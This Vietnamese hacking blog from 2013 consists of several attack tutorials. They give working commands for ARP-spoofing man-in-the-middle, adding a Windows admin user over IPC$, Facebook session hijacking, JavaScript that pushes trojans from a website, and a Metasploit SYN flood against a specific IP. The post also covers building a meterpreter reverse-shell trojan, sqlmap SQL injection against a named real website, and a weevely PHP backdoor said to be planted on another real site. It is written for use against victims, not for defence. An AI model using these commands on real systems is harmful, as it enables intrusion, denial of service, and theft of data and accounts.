Ở tầng này chúng đề cập đến khái niệm MAC . Trên đường truyền thì các nut mạng Lan gửi gói tin cho nhau thông qua địa chỉ IP,nhưng trước khi vào đến phần cứng, thì địa chỉ IP này đc chuyển đổi sang địa chỉ MAC.Và để phân giải từ địa chỉ IP sang địa chỉ MAC ta có giao thức ARP ( Address access protocol ).Đồng thời trên vùng này cũng dành ra bộ nhớ lưu trữ các địa chỉ  MAC và IP để tăng tốc họat động. (Để kiểm tra có thể dùng lệnh arp -a ,trên winxp thì thấy nó hiện ra luôn địa chỉ MAC ,nhưng trên win8 thì ko :( ).

Trong phương pháp tấn công MITM (man in the middle ).Nó tấn công vào tầng dữ liệu này.Giả mạo gói dữ liệu ARP ,liên tụcgửi lại cho host_gửi 1 gói tin ARP reply khi nhận đc gói ARP request,từ đó mạo danh victim.Làm nhầm lẫn thông tin lấy về đc của host_gửi_đi_gói_tin.

Phương pháp tấn công MITM

MITM [ man in the middle ] - Là một phương thức tấn công của attacker,trong đó attacker đứng giữa,nhận thông tin trao đổi giữa 2 đầu truyền tin.Bên A truyền cho bên B,thông tin sẽ đi từ A qua attacker rồi mới đến B .Và tất nhiên attacker có thể xem và thay đổi thôi tin trước khi truyền đến đích.Hôm nay capuchino có đọc qua tài liệu về các thiết bị giao tiếp mạng .Trong đó có cơ bản là Hub, Switch,Router.....

Trong đó cơ chế bảo mật đi từ thấp đến cao.Hub chỉ chia ra các cổng,nhưng các gói tin đi qua nó,đều qua các cổng hết,đến khi nào nó đến máy thì mới xem đó có phải là đích đến thích hợp hay ko.Điều này rất nguy hiểm trong mạng Lan .Vì như thế nghĩa là bất kì máy nào cũng có thể bắt các gói tin này.

Đối với Switch thì khác.Switch là một thiết bị thông minh hơn Hub vì trên Switch có lưu trữ địa chỉ Mac của các máy đến.Điều này có nghĩa là các gói tin đến switch nó xem như đã xác định đc đích đến là đâu.Ko cần phải tới máy đích nữa.Điều này đảm bảo gói tin đến đc đúng đích.Đồng thời nó cũng đảm bảo đc ko có xung đột có thể xảy ra.

Router thì còn thông minh hơn Switch nữa.Trên nó lưu trữ rất nhiền thông tin.Từ các giao thức,tính toán đường đi,tốc độ,độ tin cậy.Và bảo mật cũng tốt hơn.Kiến thức capuchino có hạn nên ko trình bày sâu đc.hihi.

Trở lại với MITM.
Ở cây capuchino trình bày về giả mạo ARP.Phương pháp tấn công này rất là lợi hại,nó có thể vượt qua bảo mật và sự thông minh của switch và router.
Nói rõ hơn 1 tí về giao thức ARP ( tên đầy đủ là address resolution Protocol) .nguyên tắc làm việc của ARP là là ghi chép và phân tích các địa chị IP và địa chỉ MAC tương ứng.Giả sử như ta có 2 host là host1 và host2 chẳng hạn.Vậy việc truyền tin giữa 2 host này như thế nào.Để truyền đc tin thì phải xác định đích đến cái đã.để làm đc việc này host1 gửi một gói tin ARP [ yêu cầu tìm địa chỉ MAC của host2 có ip là IP2 đi) .Gói ARP này sẽ hỏi các host xem nó có IP2 ko,nếu đúng thì gửi lại địa chi MAC cho nó [ gói truyền đi là gói ARP request chứa MAC máy gửi đi và IP của máy cần tìm,Gói về là gói ARP reply chứa MAC của máy đã tìm đc,hoặc thêm gì nữa thì capuchino ko rõ nha, vì sao phải lấy địa chị MAC mặc dù có IP gửi rồi.Cái này có liên quan đến cấu trúc mạng,chưa 7 tầng (cấu trúc mạng OSI)].Như vậy sẽ xác định được điểm đến..Như đã nói ở trên.Việc phân tích MAC-IP này nằm trên switch.Vậy đánh lừa như thế nào để lấy đc thông tin trên đường truyền đây.Chúng ta sẽ gửi liên tiếp các gói ARP reply ,trong đó có chưa MAC của máy mình tới máy chủ,và làm cho nó nghĩ MAC đó là MAC của victim.Và nó nhầm tưởng ta là đích đến.

Mình sẽ làm demo về phương pháp tấn công này nhé.

Đầu tiên mở terminal lên.
sửa lại file ip_forward bằng lệnh echo và toán tử viết chèn vào cuối file >>
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
xong rồi đọc lại file này xem đã ghi thành công chưa nhé,nếu nhận đc là 1 thì là oke á
cat  /proc/sys/net/ipv4/ip_forward
giả sử ip của victim là 192.168.201.129 nhé
trong đó gateway là 192.168.201.2

ta tiếp tục
arpspoof -i eth0 -t 192.168.201.2 192.168.201.129 

sau khi nó chạy,thì terminal này bị busy,ta ko thể thao tác lệnh tiếp,vì nó phải giữ session lại.
Rất may trên backtrack cho phép ta thao tác đa nhiệm.
Mở 1 terminal khác lên,gõ screen rồi enter .

trên terminal mới tiếp tục
arpspoof -i eth0 -t 192.168.201.129  192.168.201.2

Thứ Năm, 14 tháng 3, 2013

Một số thủ thuật connect vào VICTIM

[Sưu tầm,có mấy chỗ sai tè le ]
Phần 1 : Net

Chỉ cần bạn có được User và Passwords của một IP nào trên Net…thế là bạn có thể kết nối một IPC$ rồi đấy….bây giờ tui xin ví dụ là bạn có được User là hbx và passwords : 123456…IP : 127.0.0.1 
Hãy mở trình Ms dos và gõ vào lệnh sau :
Code:
Net use \\127.0.0.1\ipc$ “123456″ /user:”hbx”
để kết nồi một IPC$ với máy victtim, nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dũng
———————————————————————————————–
bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới …
chúng ta cộng thệm môt user mới là heibai và password là lovechina
Code:
Net user heibai lovechina / add
nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator
Code:
Net Localgroup Adminstrator heibai / add
—————————————————————————————————-
trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer
Code:
Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )
Z là của mình…còn C$ là của Victim
—————————————————————————————————� ��-
Phần 2 : AT

Hack tài khoản facebook bằng cách ăn cắp session [attack session hijacking]

Tiếng anh nó có cái tên là attack session hijacking.Nó được miêu tả là một phương pháp tấn công bằng cách lấy các session đc lưu sau khi nguời dùng đăng nhập.Sau đó giải mạo chính các session này để đăng nhập.Session thường được lưư trong các cookie.Trong các bài check vvb cũng có bài ăn cắp session thông qua bug search.Ở đây cũng tương tự như vậy.Nhưng để ăn cắp đc session của facebook thì ko có thông qua bug nào hết.Mà ta chặn bắt các gói thông qua switch [ Capuchino cũng chưa hiểu cơ chết họat động khác nhau giữ switch và router lắm,cái này nghiên cứu sau vậy].Đại loại thế.Bắt đầu nào
đầu tiên ta tải bộ công cụ scan wireshark ở trang chủ wireshark.org về cài đặt.Trước khi cài đặt cái này thì phải tại winPcap về đã.Để tí nữa nó tìm card mạng cho mình [ trang chủ của winPcap ở đây nhé http://www.winpcap.org/install/default.htm ].
Tải xong về mở lên thì đại loại nó có giao diện như thế này


Một số code gắn trojan vào site [ sưu tầm]



Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a,Dùng 1 đoạn mã javascript để mở và phát tán trojan
<script language=javascript>
open(”địa chỉ con trojan”);
</SCRIPT>
Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra
b,
bạn copy vào notepad đoạn mã sau:

Thứ Tư, 13 tháng 3, 2013

DDOS tcp synflood với Backtrack

Capuchino xin giới thiệu một phương pháp ddos rất nổi tiếng [ nên chỉ giới thiệu cho newbie thui nha ].Đó là phương pháp attack tcp synflood.Phương pháp này được phát triển dựa trên cơ chế gửi các request lên server.[ Cơ chế scan port cũng tương tự như vậy].Attacker gửi các gói lên,nếu server gửi lại các gói trả lời qua 1 port nào đó,thì ta xác định đc port này mở hay đóng.Cơ bản là như vậy,vì còn các cách gửi khác nhau,bởi các phương pháp khác nhau nữa,đôi khi gửi request mà server ko trả lời .Thì port đc gửi request đó lại đc mở.Lang thang thế,vào vấn đề chính,các gói đc gửi ở đây (gói gửi đi là gói SYN).Nếu đc gửi đến 1 server nào đó,với một số lượng quá nhiều ,nó làm cho bộ nhớ trên server,dùng để ghi lại các gói dữ liệu bị đầy.Dẫn đến cạn kiệt tài nguyên,nên đơ luôn.Nhưng tất nhiên là ko dễ để làm server cạn kiệt tài nguyên như thế.Vì server nó tính sẵn rồi.Để tránh việc cạn kiệt bộ nhớ này,nên nó chỉ lưu ,và ghi nhận 1 số request mà thôi.Số còn lại bị từ chối.Do có quá nhiều kết nối như vậy nên dẫn đến một số kết nối hợp lệ bị oan mà cũng bị từ chối luôn.


Vào terminal type:msfconsole
tiếp tục type:use auxiliary/dos/tcp/synflood
tiếp tục set các tham số cho nó
set RHOST 221.132.33.12
set TIMEOUT 500
set RPORT 80
set SNAPLEN 65535
run
 trong dó SNAPLEN là số byte .
Xong ngồi chờ thành quả thui.

Dùng backtrack hack win7 64bit

Capuchino có trình bày mấy bài về dùng backtrack và các bộ công cụ của nó để tạo trojan connect ngược về rồi,Bài này capuchino trình bày tiếp,với đối tượng là win7 64 bit nhé.
đầu tiên là vào bộ Social-Engineer-Toolkit-SET
cd /pentest/exploits/set
nếu vào mà ko có thì tải nó về máy vậy
vào cd /pentest/exploits/
xong rồi type:svn co http://svn.secmaniac.com/social_engineering_toolkit set/


Tải về đại loại nó như vậy nhé.Xong rồi vào thư mục set
cd set
ls
xong rồi tiếp nhé
type: ./set

DDOS server open port 3389 dùng Backtrack

Hôm nay capuchino lượn lờ trong vhb thấy có bài http://vhbsystem.net/@4rum/showthread.php?1108-Send-Socket-Window-Qua-Port-Remote-3389&p=6090
thấy trong bài có vài victim mở port 3389,nên nhân tiện capuchino viết tutorial ddos server mở port này.
đầu tiên để kiểm tra victim có mở port này ko,chúng ta dùng nmap để scan nhé.
victim demo ở đây là mugiaitri.net



Thứ Hai, 11 tháng 3, 2013

Tạo trojan ,attack win xem webcam,kill antivirus

Đầu tiên ta tạo một con trojan để gửi cho victim nhé.
Mở terminal lên type
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.201.132 LPORT=4444 X > /root/Desktop/capuchino.exe


Lệnh này tạo ra một con trojan tên là capuchino.exe trỏ về host  là LHOST=192.168.201.132 [IP máy mình ấy ,dùng ifconfig để lấy ip máy mình nhé ] Port lắng nghe là 4444 ,file trojan tạo ra nằm ở Desktop.
Sau khi tạo ra con trojan này thì tìm cách lừa đưa victim chạy :))

Rồi ta mở msfconsole lên
type:msfconsole
tíếp type như sau
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.201.132
 ở đây là ip máy mình ấy lhost nghĩa là local host,còn rhost nghĩa là remote host
exploit

Chủ Nhật, 10 tháng 3, 2013

Cách chạy phần mềm trên Backtrack [linux tương tự luôn]

Trong linux các phần mềm có thể được đóng gói dưới nhiều dạng khác nhau,chính vì vậy mà để chạy đc các phần mềm này chúng ta cũng phải dùng các cách khác nhau,mình giới thiệu sơ qua vài cách nha.

trước tiên là ta xét các gói đc down về máy bằng lệnh wget nhé.

Đối với file .deb


file này trên ubuntu do có application sẵn để đọc nó rồi,nên chỉ cần kích đôi là nó chạy à,còn trên backtrack thì chưa có.ta có thể chạy file này bằng lệnh
dpkg -i name_file.deb

chú ý là khi tải về phải tải đúng phiên bản nha,đối với backtrack 32 bit thì ta tải các gói có đuôi là i386
mình ví dụ như

wget https://dl.google.com/linux/direct/google-chrome-stable_current_i386.deb
còn đối với backtrack 64bit thì đuôi thường là amd64 nhé
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
Khi chạy thì ta chạy như sau
dpkg -i google-chrome-stable_current_amd64.deb
dùng phím tab để gõ nhanh chóng tên file nhé.hoặc gõ thế này cho nhanh nè
dpkg -i google*.deb


ĐỐi với các gói đc nén dưới dạng tar ,tar.gz ,tar.bz2...

thì trước tiên ta phải bung nén ra nhé,bung nén ra bằng các lệnh tương ứng như sau
tar zxvf file.tar.gz
tar xvf file.tar
tar zxf gile.tgz
[tgz = tar.gz]
tar jxf file.tar.bz2
tar jxf file.tbz2
[tbz2 = tar.bz2]
ở đây các tuy chọn đc mô tả như sau
-x là lệnh thực thi bung file
-z là đối với các file đc nén dạng gzip
-j là đối với các file được nén dạng bzip
-v đã để cho ta thấy danh sách cách file đang bung
-f là cho nó hiểu ta đang thao tác với file
sau khi giải nén xong,chúng ta di chuyển đến thư mục mới tạo ra nhé,và vào trong đó,thao tác tiếp
đầu tiên là

SQLi dùng bộ sqlmap trong backtrack 5

Lần trước đã có bài check sqli bằng bộ công cụ Darkmysql,hôm nay capuchino trình bày check sqli bằng bộ công cụ sqlmap trong backtrack 5 .Victim demo vẫn là autohoabinh.com nhé.
link lỗi sqli  http://autohoabinh.com/?page=products_detail&id=296&catid=2'
Vào thư mục chưa bộ công cụ sqlmap
cd /pentest/database/sqlmap/

đầu tiên ta get database nhé

python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" --dbs

ở đây --dbs là databases
thêm 1 số cái nữa như

--dbs                DBMS databases
--tables             DBMS database tables
 --columns         DBMS database table columns
 --schema          DBMS schema
 --dump             dump dữ liệu

'

Tạo Backdoor bằng weevely trong backtrack5

Để tạo 1 backdoor đơn giản nhất đã encrypte ta có thể dùng bộ công cụ weevely trong backtrack 5.Con backdoor tạo ra có thể vượt đc anti,ko bị phát hiện.
đầu tiền mở terminal lên,vào thư mục chứa công cụ
cd /pentest/backdoors/web/weevely 
xem các file có trong này

Tạo một con backdoor bằng cấu trúc lệnh như sau
./weevely.py generate capuchino /root/Desktop/capuchi.php
trong đó /root/Desktop/capuchi.php là tên file và vị trí nó nằm capuchino là password đc set nhé


generate là lệnh tạo ra file,nhờ nó mà sau này ta có thể connect với con backdoor này bằng chính bộ weevely.

ta ví dụ như sau,up con backdoor này lên một server nào đó nhé.Mình lấy 1 ví dụ bằng 1 con shell đc share trên vhb ha.
victim bị upshell lên là topvn.vn
link shell là http://topvn.vn/sanpham/capuchi.php